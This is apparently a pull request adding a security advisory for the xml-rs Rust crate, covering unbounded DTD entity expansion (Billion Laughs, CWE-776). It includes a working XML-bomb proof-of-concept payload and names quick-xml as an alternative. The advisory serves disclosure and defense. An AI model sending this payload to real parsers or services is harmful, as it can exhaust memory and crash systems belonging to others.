### PR TITLE
Add advisory for xml-rs: unbounded entity expansion (Billion Laughs)

### DIFF
--- a/crates/xml-rs/RUSTSEC-0000-0000.md
+++ b/crates/xml-rs/RUSTSEC-0000-0000.md
@@ -1,0 +1,47 @@
+```toml
+[advisory]
+id = "RUSTSEC-0000-0000"
+package = "xml-rs"
+date = "2026-02-22"
+url = "https://github.com/netvl/xml-rs/issues/228"
+categories = ["denial-of-service"]
+keywords = ["xml", "billion-laughs", "entity-expansion", "dos"]
+
+[versions]
+patched = []
+unaffected = []
+```
+
+# xml-rs: Unbounded Entity Expansion (Billion Laughs / XML Bomb)
+
+xml-rs supports internal DTD entity definitions and expands entity references
+recursively during parsing with no depth limit or expanded-size limit.
+
+An attacker can craft an XML document with recursively defined entities (the
+"Billion Laughs" attack, CWE-776) that causes exponential memory consumption
+and CPU exhaustion. A sub-1KB XML payload can expand to gigabytes of text
+(~3,000,000x amplification ratio), crashing the process or host.
+
+Any application using xml-rs to parse untrusted XML input is vulnerable.
+
+## Proof of Concept
+
+```xml
+<?xml version="1.0"?>
+<!DOCTYPE lolz [
+  <!ENTITY lol "lol">
+  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
+  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
+  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
+  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
+  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
+  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
+  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
+  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
+]>
+<root>&lol9;</root>
+```
+
+## Alternatives
+
+- [quick-xml](https://crates.io/crates/quick-xml) does not expand entities by default


### PR DESCRIPTION
Advisory for xml-rs: Unbounded Entity Expansion (Billion Laughs / XML Bomb, CWE-776)

xml-rs expands DTD entity references recursively with no depth or size limit. A sub-1KB payload can cause exponential memory consumption (~3M amplification ratio).

No patch exists. Alternative: quick-xml (does not expand entities by default).